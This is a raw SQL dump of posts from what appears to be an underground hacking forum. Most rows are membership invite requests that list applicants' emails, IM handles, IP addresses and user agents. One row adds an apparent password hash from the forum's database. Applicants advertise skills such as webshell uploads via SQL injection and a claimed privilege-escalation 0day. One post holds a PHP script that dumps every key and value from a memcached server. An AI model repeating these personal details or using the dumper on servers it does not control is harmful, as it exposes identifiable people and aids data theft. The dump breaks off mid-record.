(1473, 1332, 0, 'Invite', 2, '{$name}', 1407645723, '[SIZE=\'4\'][COLOR=\'Sienna\']LeNo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: l3n0@darkode.com\n[b]e-mail[/b]: l3n0@msn.com\n[b]Info[/b]: I m darkode Mod.\r\nSkills : hacking / reversing / malware\r\nrecent hack jabber servers , shodan, porn network many etc that i can show you on jabber in person.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.199.193.178\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://leno.lv | leno.lv \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1477, 1336, 0, 'syslink', 13, 'memache-dumper', 1407662078, '[PHP]#!/usr/bin/env php\r\n\'.PHP_EOL;\r\n exit;\r\n}\r\n\r\n$memcache = new Memcache;\r\n$memcache->connect($argv[1]);\r\n\r\n$slabs = $memcache->getExtendedStats(\'slabs\');\r\n$items = $memcache->getExtendedStats(\'items\');\r\n\r\n$data = array();\r\n\r\nforeach ($slabs as $server => $server_slabs) {\r\n\r\n foreach ($server_slabs as $slab_id => $slab_metadata) {\r\n\r\n if (is_int($slab_id)) {\r\n\r\n $cache_dump = $memcache->getExtendedStats(\'cachedump\', $slab_id);\r\n\r\n foreach ($cache_dump as $cache_server => $entries) {\r\n\r\n if ($entries !== false) {\r\n\r\n foreach ($entries as $key => $value) {\r\n\r\n $data[$key] = array(\r\n \'key\' => $key,\r\n \'server\' => $cache_server,\r\n \'slab_id\' => $slab_id,\r\n \'value\' => $memcache->get($key),\r\n \'age\' => $items[$cache_server][\'items\'][$slab_id][\'age\'],\r\n );\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n$output = \'\';\r\n$output .= \'Memcached dump \';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'\';\r\n$output .= \'Key \';\r\n$output .= \'SlabID \';\r\n$output .= \'Age \';\r\n$output .= \'Value \';\r\n$output .= \' \';\r\n\r\nforeach ($data as $values) {\r\n\r\n $output .= \'\';\r\n $output .= \'\'.$values[\'key\'].\' \';\r\n $output .= \'\'.$values[\'slab_id\'].\' \';\r\n $output .= \'\'.$values[\'age\'].\' \';\r\n $output .= \'\'.var_export($values[\'value\'], true).\' \';\r\n $output .= \' \';\r\n}\r\n\r\n$output .= \'
\';\r\n\r\nfile_put_contents(\'/tmp/memcached-dumper.html\', $output);[/PHP]', 1, 0, '', 0, 1, 0, 0, 0),
(1478, 1337, 0, 'Invite', 2, '{$name}', 1407666743, '[SIZE=\'4\'][COLOR=\'Sienna\']charmander[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: thecharbok@gmail.com\n[b]e-mail[/b]: thecharbok@gmail.com\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1479, 1338, 0, 'Invite', 2, '{$name}', 1407679024, '[SIZE=\'4\'][COLOR=\'Sienna\']z0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 668757190\n[b]e-mail[/b]: b9n@hotmail.com\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.163.234.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://z0rx.wordpress.com | z0rx.wordpress.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1480, 1339, 0, 'Invite', 2, '{$name}', 1407680096, '[SIZE=\'4\'][COLOR=\'Sienna\']g0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g0rx@jabbim.com\n[b]e-mail[/b]: bansolik@mail.com\n[b]Info[/b]: Good expereivnse in sql inj, lfi, rfi. Uploading webshells through sql inj. own 0day Win Ldap domain privilage excalation. 5 years of experience.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.3.146.112\n[*][b]real ip[/b]: 195.3.146.112\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://extratorrent.cc/profile/g0rx/ | http://extratorrent.cc/profile/g0rx/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1481, 1340, 0, 'Invite', 2, '{$name}', 1407693525, '[SIZE=\'4\'][COLOR=\'Sienna\']Kaimi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: admin@kaimi.ru\n[b]e-mail[/b]: admin@kaimi.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://kaimi.org | kaimi.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1482, 1341, 0, 'Invite', 2, '{$name}', 1407694752, '[SIZE=\'4\'][COLOR=\'Sienna\']Bl4k3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: Bl4ke1@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.43.32.187\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://bl4k3.tumblr.com | bl4k3.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1483, 1342, 0, 'Invite', 2, '{$name}', 1407695253, '[SIZE=\'4\'][COLOR=\'Sienna\']mark[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none\n[b]e-mail[/b]: linnomarkus@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.111.160.30\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Mark : mark4545@yandex.ru : 82.198.27.146 : f392281cb6f97d82b85f2bb652e52cad\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mark.ru | mark.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1484, 1343, 0, 'Invite', 2, '{$name}', 1407698884, '[SIZE=\'4\'][COLOR=\'Sienna\']bidhata[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 65975621\n[b]e-mail[/b]: bidhata@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 202.142.71.93\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/kcbidhata | https://twitter.com/kcbidhata \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1485, 1344, 0, 'Invite', 2, '{$name}', 1407698955, '[SIZE=\'4\'][COLOR=\'Sienna\']th3hunt3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: th3hunt3r@jabber.ccc.de\n[b]e-mail[/b]: IBoyough3462@jourrapide.com\n[b]Info[/b]: Web applications developper and security enthusiast\r\nPHP, MySQL, Javascript\r\nC and C networking \r\nsoftware exploitation research\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.9.90.72\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lostclanus.com/profile/131609 | http://www.lostclanus.com/profile/131609 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1486, 1345, 0, 'Invite', 2, '{$name}', 1407699098, '[SIZE=\'4\'][COLOR=\'Sienna\']phenyll[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 274404233\n[b]e-mail[/b]: worm@phenyll.com\n[b]Info[/b]: Developer in C, C++, C#, Java, Webbased languages for more than 5 years each\r\n\r\nI develop enterprise software in the field of online shops, insurances, financial analysis and business intelligence.\r\n\r\nMy solutions are in operation in companies with 50 to 500 employees. As I always have to consider security-related issues and am personally interested it\'d be gate great to profit from your database. I am not very active in online communities, though I can be found as phenyll on twitter, stackoverflow and so on. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.253.252.238\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.4.2; SM-P605 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.131 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1487, 1346, 0, 'syslink', 13, 'Media', 1407700395, '[url]http://www.forbes.com/sites/quora/2014/07/24/how-wsjs-facebook-page-got-hacked-and-what-others-should-do-to-prevent-this/[/url]\r\n\r\n[url]http://www.forbes.com/sites/thomasbrewster/2014/07/14/russian-hacker-breaches-cnet-servers/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1488, 1347, 0, 'Invite', 2, '{$name}', 1407700460, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: null\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1489, 1348, 0, 'Invite', 2, '{$name}', 1407700542, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: 46.165.222.245\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1490, 1346, 1487, 'syslink', 13, '', 1407704532, '[url]http://arstechnica.com/security/2014/07/wsj-website-hacked-data-offered-for-sale-for-1-bitcoin/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1491, 1349, 0, 'Invite', 2, '{$name}', 1407704759, '[SIZE=\'4\'][COLOR=\'Sienna\']gh057[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: yobuddy@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 84.2.105.71\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1492, 1350, 0, 'Invite', 2, '{$name}', 1407705004, '[SIZE=\'4\'][COLOR=\'Sienna\']Attachi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 437844\n[b]e-mail[/b]: entferner@ya.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.78.199.213\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://attachi.com | attachi.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1493, 1351, 0, 'Invite', 2, '{$name}', 1407706766, '[SIZE=\'4\'][COLOR=\'Sienna\']mjrod5[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dn44@jodo.im\n[b]e-mail[/b]: dasdasz3@yandex.com\n[b]Info[/b]: Experience coding c++/asm (malware),/php/js.\r\nKnows:\r\nxxe,xss,sqli,rfi,lfi,csrf,ssrf.\r\nhttp://www.ic0de.org/member.php?13265-mjrod5\r\nhttps://www.opensc.ws/members/mjrod5.html\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.31.136.244\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mjrod5.deviantart.com | mjrod5.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1494, 1352, 0, 'Invite', 2, '{$name}', 1407707519, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr.MaGnoM[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: magnomdanszo@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.129.1.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/MrMaGnoM | https://twitter.com/MrMaGnoM \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1495, 1353, 0, 'Invite', 2, '{$name}', 1407710881, '[SIZE=\'4\'][COLOR=\'Sienna\']GB47[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g.belhadj47\n[b]e-mail[/b]: gb47@msn.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 